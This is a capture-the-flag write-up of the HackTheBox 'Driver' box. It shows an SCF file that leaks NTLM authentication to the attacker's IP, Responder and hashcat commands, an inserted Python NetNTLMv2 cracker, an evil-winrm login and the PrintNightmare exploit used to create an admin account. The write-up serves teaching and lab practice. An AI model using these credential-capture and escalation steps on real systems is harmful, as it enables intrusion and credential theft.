Driver — Hackthebox Walkthrough

Kavishka Gihan
4 min readFeb 26, 2022

I am happy to say that someone finally made an easy Windows box on HTB. Great thanks to @MrR3boot for that. I loved this box as it had a pretty unique attack path and didn't need much knowledge about Windows specifics.

User

Starting off with nmap I saw there were a couple of ports open: 80 (HTTP, IIS), 135 (MSRPC), 445 (SMB) and 5985 (WinRM over HTTP).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Visiting the web server on port 80, I found a static website about firmware updates for printers. Looking around a bit, I saw a page that allowed me to upload firmware.

Since the page stated that uploaded files are stored on a file share and reviewed manually, I knew this had something to do with the SMB server we saw in the nmap results: someone (or a scripted "user") is going to open that share and look at whatever lands there.

I first tried uploading PHP reverse shells to see if I could get a shell that way, but that was a bust; the upload is never executed by the web server. So I had to do some digging. While I was looking, I came across an article explaining SCF (Shell Command File) attacks against SMB shares: Windows Explorer parses a .scf file as soon as the folder containing it is rendered, and if its IconFile points at a UNC path, Explorer fetches the icon from that host and authenticates to it with NTLM on the way.

As mentioned in the article, I made an SCF file called "attack.scf" (the extension matters; Explorer only treats .scf files this way).

[Shell]  
Command=2
IconFile=\\10.10.14.235\test\test.ico
[Taskbar]
Command=ToggleDesktop

Then I started Responder on the VPN interface so it would answer the SMB connection and log the authentication attempt.

sudo responder -I tun0 -vv

Finally I uploaded the attack.scf file I made. A moment later Responder logged a NetNTLMv2 challenge/response for the tony user.

What seems to have happened was this: once attack.scf was on the share, the tony user (a scheduled process on the box) opened the share in Explorer. Explorer rendered the folder, parsed the .scf, and tried to load the icon from the UNC path in IconFile, which points at our host. Responder answered the SMB connection with its own server challenge, and tony's machine dutifully authenticated with NTLM, so Responder captured the NetNTLMv2 response. Note that this is a challenge/response, not a password hash: it cannot be replayed or passed like an NT hash, so the next step is an offline dictionary attack.
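To make concrete what Responder actually wrote out and what hashcat mode 5600 recomputes for each candidate password, here is an added example (my code, not part of the original walkthrough). It implements the NetNTLMv2 chain (NT hash = MD4 of the UTF-16LE password, NTLMv2 key = HMAC-MD5 over UPPER(user)+domain, NTProofStr = HMAC-MD5 over server challenge || blob) and a small dictionary check over a capture line in the Responder/hashcat layout. The capture line itself is constructed by make_capture() with a fixed challenge and blob and the password the walkthrough recovered; it is not the one captured from the box, and the short wordlist is a stand-in for rockyou.txt. MD4 is implemented in pure Python because hashlib's md4 is often unavailable under OpenSSL 3.

```python
"""What Responder captures and hashcat -m 5600 cracks: a NetNTLMv2 checker.

Added example, not code from the original walkthrough. The capture line is
CONSTRUCTED by make_capture(); it is not the response taken from the box.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often missing under OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:          # pad to 56 mod 64, then append the bit length
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)

    def rol(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):             # round 1: F = (b & c) | (~b & d)
            a = rol((a + ((b & c) | (~b & d)) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):             # round 2: G = majority, constant sqrt(2)
            k = 4 * (i % 4) + i // 4
            a = rol((a + ((b & c) | (b & d) | (c & d)) + x[k] + 0x5A827999) & MASK,
                    (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):             # round 3: H = xor, constant sqrt(3)
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rol((a + (b ^ c ^ d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); the value a pass-the-hash attack would need."""
    return md4(password.encode("utf-16-le"))


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(HMAC-MD5(NThash, UPPER(user)+domain), server_challenge || blob)."""
    ntlmv2_key = hmac.new(nt_hash(password),
                          (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, hashlib.md5).digest()


def parse_capture(line: str):
    """Responder / hashcat 5600 layout: user::domain:serverchallenge:ntproofstr:blob (hex)."""
    user, _, rest = line.strip().partition("::")
    domain, chal, proof, blob = rest.split(":", 3)
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def check_candidate(line: str, password: str) -> bool:
    """True if `password` reproduces the NTProofStr in the capture."""
    user, domain, chal, proof, blob = parse_capture(line)
    return hmac.compare_digest(nt_proof(password, user, domain, chal, blob), proof)


def crack(line: str, wordlist):
    """Dictionary attack in the spirit of `hashcat -m 5600`; returns the first hit or None."""
    for word in wordlist:
        if check_candidate(line, word):
            return word
    return None


def make_capture(user: str, domain: str, password: str) -> str:
    """Build a CONSTRUCTED capture line so the checker can be exercised offline.

    The challenge and blob are fixed placeholders. On the wire the blob carries a
    version header, timestamp, client challenge and target info; for the proof
    computation they are just bytes under the HMAC, which is why a dictionary
    attack on the capture is exactly what hashcat does.
    """
    server_challenge = bytes.fromhex("1122334455667788")
    blob = bytes.fromhex("01010000" + "00000000" + "00" * 8 + "8877665544332211" + "00000000")
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample: the shape of what Responder prints for `tony` on host DRIVER,
# generated here with the password the walkthrough recovered.
SAMPLE_CAPTURE = make_capture("tony", "DRIVER", "liltony")
SAMPLE_WORDLIST = ["123456", "password", "tony", "liltony"]  # stand-in for rockyou.txt

if __name__ == "__main__":
    print(crack(SAMPLE_CAPTURE, SAMPLE_WORDLIST))  # liltony
```

The same check_candidate() works on a real Responder line (hashcat's 5600 input format), which is a handy way to confirm a cracked password offline before burning a login attempt on the target.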

Then I used hashcat to crack the captured response. Mode 5600 is NetNTLMv2; --force only silences hashcat's driver warnings and is not needed on a supported setup.

hashcat -m 5600 --force hash.txt rockyou.txt

I got the password as liltony. With this, I used evil-winrm (port 5985 was open) and logged in to the box as tony.

evil-winrm.rb -u tony -p liltony -i 10.10.11.106

Root

First off, I uploaded and ran winpeas.exe for basic enumeration. There were no eye-catching vulnerabilities to be found, but I saw "spoolsv" (the Print Spooler process) was running.

So I googled this and found out about a CVE nicknamed PrintNightmare. As the name suggests, it targets the Print Spooler, a built-in Windows service that is enabled by default on Windows machines; the spooler runs as SYSTEM and will load a printer driver DLL supplied by an ordinary user, which is what makes it a local privilege escalation.

With a little effort, I found a PowerShell exploit on GitHub for this (the script is named after CVE-2021-1675, the identifier the bug was first tracked under).

So I cloned the repository and uploaded the PowerShell script to the box. Before running it I had to change the execution policy to be able to import the module I uploaded. The CurrentUser scope works without admin rights, which is the point; launching powershell with -ExecutionPolicy Bypass would do the same.

Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

Then, as described in the README.md, I imported the script as a module and ran it.

Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare

The script added a new user called adm1n, with the password P@ssw0rd, to the local Administrators group. Finally, I was able to log in with those credentials and get administrative access to the machine. Worth remembering on a real engagement: this leaves a new local admin account and a planted printer driver behind, both of which need to be cleaned up and reported.

Rooted!!!

“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”

Email — iamkavigihan@gmail.com
Instagram —
https://www.instagram.com/_kavi.gihan/

Happy Hacking !!! 😄
